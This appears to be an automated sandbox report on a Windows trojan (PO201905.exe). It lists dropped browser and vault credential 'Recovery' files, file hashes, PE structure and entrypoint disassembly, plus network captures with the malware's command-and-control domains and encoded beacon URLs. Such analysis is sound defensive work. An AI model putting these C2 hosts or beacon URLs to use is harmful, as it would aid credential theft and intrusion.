Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......B...t..]@...1.J..#......^YG......dN.V.R.br...W...v.$?h.......SXcE.iv......aZ|..tyu..z..k_..j..63...D7........,.j.p..).QE..Q^.m....0.......).....fO........W.j......qqo....8.$Mk.9..o8..b...N........)$n0T...QE..QE..Q^..G....E..g......@.."l.H[....=zP..._UC...-......I.".>.d...T..@~....,....*.>X..........<.....s..xgr.QK.-.X.r2r:r0|...(...(...(...(...(
C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrf.ini Download File
Process:C:\Program Files\Mozilla Firefox\firefox.exe
File Type:data
Size (bytes):40
Entropy (8bit):2.8420918598895937
Encrypted:false
MD5:2F245469795B865BDD1B956C23D7893D
SHA1:6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
SHA-256:1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
SHA-512:909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
Malicious:true
Reputation:high, very likely benign file
Preview:....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....
C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini Download File
Process:C:\Windows\System32\ipconfig.exe
File Type:data
Size (bytes):40
Entropy (8bit):2.8420918598895937
Encrypted:false
MD5:D63A82E5D81E02E399090AF26DB0B9CB
SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:true
Reputation:high, very likely benign file
Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrv.ini Download File
Process:C:\Windows\System32\ipconfig.exe
File Type:data
Size (bytes):40
Entropy (8bit):2.96096404744368
Encrypted:false
MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
Malicious:true
Reputation:moderate, very likely benign file
Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.shakeitmiami.com208.91.197.91truetrueunknown
a767.dscg3.akamai.net23.10.249.17truefalsehigh
www.dazhen.ltd.w.kunlunsl.com47.246.2.232truefalse0%, virustotal, Browseunknown
www.lianhe.inkunknownunknowntrueunknown
www.dazhen.ltdunknownunknowntrue0%, virustotal, Browseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://www.dazhen.ltd/c917/false
    unknown
    http://www.shakeitmiami.com/c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXMtrue
      unknown
      http://www.dazhen.ltd/c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1false
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmpfalse
          high
          http://www.%s.comPAexplorer.exe, 00000006.00000000.4496745744.01F30000.00000008.sdmpfalse
            high
            http://go.explorer.exe, 00000006.00000000.4490786039.05A85000.00000004.sdmpfalse
              high
              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.4489219800.04C00000.00000008.sdmpfalse
                high
                http://www.autoitscript.com/favicon.icoexplorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmpfalse
                  high
                  http://www.autoitscript.com/site/autoit/explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPCountryFlagASNASN NameMalicious
                    208.91.197.91Virgin Islands (BRITISH)
                    40034unknowntrue

                    Private

                    IP
                    192.168.1.22
                    192.168.1.255

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.945569120298503
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:PO201905.exe
                    File size:885760
                    MD5:27cf7e2be6e049b2793ad9f38218eb01
                    SHA1:15c4909f9bb5db1b96992fee27a15221cccb4dbb
                    SHA256:4a6f28896f4a16257ed2dbb0b71a3ed2d890b4be65b5f500b74c81a003155d61
                    SHA512:d7aeef1afc03dac5404b2f877f6b70f4c89832eb16912ad7518b3e2211850536cae140a13c1a7e824fa9848fb440beb83ce5e889b7b29da218dc5f3b87095435
                    SSDEEP:12288:32JZSgUuA/tdnWOsz9wDwwML2FD6rXNZpFCYNICoOW7SOsDVt6O:NuArnW/8R3FDmXNjw8A7ZsDVUO
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RC.s.". .". .". yT. .". yT S". yT! .". .Z. .". .". t". yT% .". ..Q .". yT. .". Rich.". ........PE..L......\.................T.

                    File Icon

                    Icon Hash:71f8dcd6d4d8702b

                    Static PE Info

                    General

                    Entrypoint:0x401b33
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x5CCEA51E [Sun May 5 08:55:58 2019 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:a323b1d57aa1c73dbadfb65978c3b109

                    Entrypoint Preview

                    Instruction
                    call 00007FD7C90BB737h
                    jmp 00007FD7C90B93FEh
                    mov dword ptr [ecx], 004071A0h
                    jmp 00007FD7C90BB87Fh
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    push esi
                    mov esi, ecx
                    mov dword ptr [esi], 004071A0h
                    call 00007FD7C90BB86Ch
                    test byte ptr [ebp+08h], 00000001h
                    je 00007FD7C90B9579h
                    push esi
                    call 00007FD7C90B9CC3h
                    pop ecx
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007FD7C90BB87Ah
                    mov dword ptr [esi], 004071A0h
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    sub esp, 10h
                    jmp 00007FD7C90B957Fh
                    push dword ptr [ebp+08h]
                    call 00007FD7C90B9C64h
                    pop ecx
                    test eax, eax
                    je 00007FD7C90B9581h
                    push dword ptr [ebp+08h]
                    call 00007FD7C90B908Fh
                    pop ecx
                    test eax, eax
                    je 00007FD7C90B9558h
                    leave
                    ret
                    test byte ptr [004CF7BCh], 00000001h
                    mov edi, 004CF7B0h
                    mov esi, 004071A0h
                    jne 00007FD7C90B959Eh
                    or dword ptr [004CF7BCh], 01h
                    push 00000001h
                    lea eax, dword ptr [ebp-04h]
                    push eax
                    mov ecx, edi
                    mov dword ptr [ebp-04h], 004071A8h
                    call 00007FD7C90BB72Ah
                    push 004062CAh
                    mov dword ptr [004CF7B0h], esi
                    call 00007FD7C90BB982h
                    pop ecx
                    push edi
                    lea ecx, dword ptr [ebp-10h]
                    call 00007FD7C90BB7FFh

                    Rich Headers

                    Programming Language:
                    • [ASM] VS2010 build 30319
                    • [LNK] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [IMP] VS2008 SP1 build 30729
                    • [C++] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x946c0x50.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd10000x8da8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000x7ec.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x71800x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90d00x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x150.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x52de0x5400False0.620442708333data6.49783034543IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x2bd00x2c00False0.355912642045data5.00651352714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xa0000xc65e40xc5800False0.976582278481data7.99430221818IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .rsrc0xd10000x8da80x8e00False0.600159551056data6.14689817549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0xda0000x19020x1a00False0.268028846154data2.80220012818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0xd12100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                    RT_ICON0xd16780x988dataEnglishUnited States
                    RT_ICON0xd20000x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4166503206, next used block 4166109221EnglishUnited States
                    RT_ICON0xd30a80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4098410274, next used block 4098148387EnglishUnited States
                    RT_ICON0xd56500x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4032091437, next used block 4032943668EnglishUnited States
                    RT_DIALOG0xd98780x388dataEnglishUnited States
                    RT_GROUP_ICON0xd9c000x4cdataEnglishUnited States
                    RT_MANIFEST0xd9c4c0x15aASCII text, with CRLF line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllSleep, HeapReAlloc, HeapSize, GetStringTypeW, MultiByteToWideChar, RtlUnwind, HeapFree, LoadLibraryW, EnterCriticalSection, LeaveCriticalSection, RaiseException, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, DeleteCriticalSection, LCMapStringW, WriteFile, HeapAlloc, DecodePointer, EncodePointer, GetSystemTimeAsFileTime, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, ExitProcess, GetStdHandle, GetModuleFileNameW, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, IsProcessorFeaturePresent
                    USER32.dllEndPaint, DestroyWindow, GetMessageW, PostQuitMessage, FillRect, LoadCursorW, MessageBeep, SetFocus, BeginPaint, wsprintfW, TranslateMessage, LoadIconW, GetDlgItem, CharUpperW, ShowWindow, CreateDialogParamW, RegisterClassW, GetSystemMetrics, SetDlgItemTextW, SendMessageW, DefWindowProcW, DispatchMessageW, MessageBoxW
                    GDI32.dllCreateSolidBrush, DeleteObject

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 6, 2019 21:25:09.905030012 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.042212963 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.042395115 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.045095921 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.183734894 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.258433104 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.258460999 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.258491993 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.258522034 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.258925915 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.261432886 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.270538092 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:10.270746946 CEST4924380192.168.1.22208.91.197.91
                    May 6, 2019 21:25:10.399070024 CEST8049243208.91.197.91192.168.1.22
                    May 6, 2019 21:25:56.164427042 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:56.219522953 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:56.219650030 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:56.219759941 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:56.275279045 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.170886040 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.170972109 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.171016932 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.171049118 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.171081066 CEST804924447.246.2.232192.168.1.22
                    May 6, 2019 21:25:57.171247959 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:57.171394110 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:57.171528101 CEST4924480192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.173449993 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.233795881 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.234023094 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.238399982 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.293483973 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.293513060 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.293603897 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.348728895 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.348788977 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.348872900 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.404644966 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.404824018 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.404845953 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.404902935 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.404923916 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.404988050 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.405173063 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.405288935 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.461594105 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461625099 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461714983 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.461883068 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461941957 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.461954117 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461977959 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461997986 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.461999893 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.462032080 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.462052107 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.462106943 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.462863922 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.462874889 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.462923050 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.465658903 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.516999960 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517127991 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.517447948 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517482996 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517502069 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517543077 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.517580032 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517663956 CEST4924580192.168.1.2247.246.2.232
                    May 6, 2019 21:25:59.517698050 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.517832041 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.518393040 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.518428087 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.520612955 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.520831108 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.521303892 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.572424889 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.572527885 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.572669983 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.572745085 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.572837114 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.573136091 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.573323965 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.573347092 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.573421955 CEST804924547.246.2.232192.168.1.22
                    May 6, 2019 21:25:59.612500906 CEST804924547.246.2.232192.168.1.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 6, 2019 21:17:09.967242002 CEST5063553192.168.1.228.8.8.8
                    May 6, 2019 21:17:10.004884005 CEST53506358.8.8.8192.168.1.22
                    May 6, 2019 21:17:10.952919006 CEST5063553192.168.1.228.8.8.8
                    May 6, 2019 21:17:10.978876114 CEST53506358.8.8.8192.168.1.22
                    May 6, 2019 21:17:11.954483986 CEST5063553192.168.1.228.8.8.8
                    May 6, 2019 21:17:11.980263948 CEST53506358.8.8.8192.168.1.22
                    May 6, 2019 21:17:13.954442978 CEST5063553192.168.1.228.8.8.8
                    May 6, 2019 21:17:13.966229916 CEST53506358.8.8.8192.168.1.22
                    May 6, 2019 21:17:17.986201048 CEST5063553192.168.1.228.8.8.8
                    May 6, 2019 21:17:18.018807888 CEST53506358.8.8.8192.168.1.22
                    May 6, 2019 21:17:36.267689943 CEST4915753192.168.1.228.8.8.8
                    May 6, 2019 21:17:36.294394016 CEST53491578.8.8.8192.168.1.22
                    May 6, 2019 21:17:37.265341997 CEST4915753192.168.1.228.8.8.8
                    May 6, 2019 21:17:37.280246973 CEST53491578.8.8.8192.168.1.22
                    May 6, 2019 21:17:38.283725977 CEST4915753192.168.1.228.8.8.8
                    May 6, 2019 21:17:38.309889078 CEST53491578.8.8.8192.168.1.22
                    May 6, 2019 21:17:40.281224966 CEST4915753192.168.1.228.8.8.8
                    May 6, 2019 21:17:40.292939901 CEST53491578.8.8.8192.168.1.22
                    May 6, 2019 21:17:44.281518936 CEST4915753192.168.1.228.8.8.8
                    May 6, 2019 21:17:44.318830013 CEST53491578.8.8.8192.168.1.22
                    May 6, 2019 21:18:19.986705065 CEST6236453192.168.1.228.8.8.8
                    May 6, 2019 21:18:20.028804064 CEST53623648.8.8.8192.168.1.22
                    May 6, 2019 21:18:20.079745054 CEST5208153192.168.1.228.8.8.8
                    May 6, 2019 21:18:20.127438068 CEST53520818.8.8.8192.168.1.22
                    May 6, 2019 21:18:55.404128075 CEST5184853192.168.1.228.8.8.8
                    May 6, 2019 21:18:55.430469990 CEST53518488.8.8.8192.168.1.22
                    May 6, 2019 21:18:56.391324043 CEST5184853192.168.1.228.8.8.8
                    May 6, 2019 21:18:56.417475939 CEST53518488.8.8.8192.168.1.22
                    May 6, 2019 21:18:57.391072035 CEST5184853192.168.1.228.8.8.8
                    May 6, 2019 21:18:57.417574883 CEST53518488.8.8.8192.168.1.22
                    May 6, 2019 21:18:59.391266108 CEST5184853192.168.1.228.8.8.8
                    May 6, 2019 21:18:59.417689085 CEST53518488.8.8.8192.168.1.22
                    May 6, 2019 21:19:03.391630888 CEST5184853192.168.1.228.8.8.8
                    May 6, 2019 21:19:03.418196917 CEST53518488.8.8.8192.168.1.22
                    May 6, 2019 21:21:59.798739910 CEST5008753192.168.1.228.8.8.8
                    May 6, 2019 21:21:59.834451914 CEST53500878.8.8.8192.168.1.22
                    May 6, 2019 21:22:00.796506882 CEST5008753192.168.1.228.8.8.8
                    May 6, 2019 21:22:00.832596064 CEST53500878.8.8.8192.168.1.22
                    May 6, 2019 21:22:01.796924114 CEST5008753192.168.1.228.8.8.8
                    May 6, 2019 21:22:01.834335089 CEST53500878.8.8.8192.168.1.22
                    May 6, 2019 21:22:03.796714067 CEST5008753192.168.1.228.8.8.8
                    May 6, 2019 21:22:03.839104891 CEST53500878.8.8.8192.168.1.22
                    May 6, 2019 21:22:07.797175884 CEST5008753192.168.1.228.8.8.8
                    May 6, 2019 21:22:07.823040962 CEST53500878.8.8.8192.168.1.22
                    May 6, 2019 21:22:09.627001047 CEST5371453192.168.1.228.8.8.8
                    May 6, 2019 21:22:09.676675081 CEST53537148.8.8.8192.168.1.22
                    May 6, 2019 21:22:09.814558029 CEST5849153192.168.1.228.8.8.8
                    May 6, 2019 21:22:09.840512991 CEST53584918.8.8.8192.168.1.22
                    May 6, 2019 21:24:14.331088066 CEST5683253192.168.1.228.8.8.8
                    May 6, 2019 21:24:14.343302011 CEST53568328.8.8.8192.168.1.22
                    May 6, 2019 21:24:15.327708960 CEST5683253192.168.1.228.8.8.8
                    May 6, 2019 21:24:15.339847088 CEST53568328.8.8.8192.168.1.22
                    May 6, 2019 21:24:16.328756094 CEST5683253192.168.1.228.8.8.8
                    May 6, 2019 21:24:16.399303913 CEST53568328.8.8.8192.168.1.22
                    May 6, 2019 21:24:18.328789949 CEST5683253192.168.1.228.8.8.8
                    May 6, 2019 21:24:18.344229937 CEST53568328.8.8.8192.168.1.22
                    May 6, 2019 21:24:22.328088999 CEST5683253192.168.1.228.8.8.8
                    May 6, 2019 21:24:22.354471922 CEST53568328.8.8.8192.168.1.22
                    May 6, 2019 21:25:09.725291967 CEST5576453192.168.1.228.8.8.8
                    May 6, 2019 21:25:09.888335943 CEST53557648.8.8.8192.168.1.22
                    May 6, 2019 21:25:34.826957941 CEST5085953192.168.1.228.8.8.8
                    May 6, 2019 21:25:34.863375902 CEST53508598.8.8.8192.168.1.22
                    May 6, 2019 21:25:39.129262924 CEST5281453192.168.1.228.8.8.8
                    May 6, 2019 21:25:39.164378881 CEST53528148.8.8.8192.168.1.22
                    May 6, 2019 21:25:55.487379074 CEST5191053192.168.1.228.8.8.8
                    May 6, 2019 21:25:56.163670063 CEST53519108.8.8.8192.168.1.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    May 6, 2019 21:25:09.725291967 CEST192.168.1.228.8.8.80xc58dStandard query (0)www.shakeitmiami.comA (IP address)IN (0x0001)
                    May 6, 2019 21:25:34.826957941 CEST192.168.1.228.8.8.80xed91Standard query (0)www.lianhe.inkA (IP address)IN (0x0001)
                    May 6, 2019 21:25:39.129262924 CEST192.168.1.228.8.8.80xbb4cStandard query (0)www.lianhe.inkA (IP address)IN (0x0001)
                    May 6, 2019 21:25:55.487379074 CEST192.168.1.228.8.8.80xa16Standard query (0)www.dazhen.ltdA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    May 6, 2019 21:17:44.318830013 CEST8.8.8.8192.168.1.220x13f5No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:17:44.318830013 CEST8.8.8.8192.168.1.220x13f5No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:21:59.834451914 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:21:59.834451914 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:22:00.832596064 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:22:00.832596064 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:22:07.823040962 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:22:07.823040962 CEST8.8.8.8192.168.1.220xedc4No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:24:16.399303913 CEST8.8.8.8192.168.1.220x2140No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:24:16.399303913 CEST8.8.8.8192.168.1.220x2140No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:24:22.354471922 CEST8.8.8.8192.168.1.220x2140No error (0)a767.dscg3.akamai.net23.10.249.17A (IP address)IN (0x0001)
                    May 6, 2019 21:24:22.354471922 CEST8.8.8.8192.168.1.220x2140No error (0)a767.dscg3.akamai.net23.10.249.50A (IP address)IN (0x0001)
                    May 6, 2019 21:25:09.888335943 CEST8.8.8.8192.168.1.220xc58dNo error (0)www.shakeitmiami.com208.91.197.91A (IP address)IN (0x0001)
                    May 6, 2019 21:25:34.863375902 CEST8.8.8.8192.168.1.220xed91Name error (3)www.lianhe.inknonenoneA (IP address)IN (0x0001)
                    May 6, 2019 21:25:39.164378881 CEST8.8.8.8192.168.1.220xbb4cName error (3)www.lianhe.inknonenoneA (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltdwww.dazhen.ltd.w.kunlunsl.comCNAME (Canonical name)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.232A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.231A (IP address)IN (0x0001)
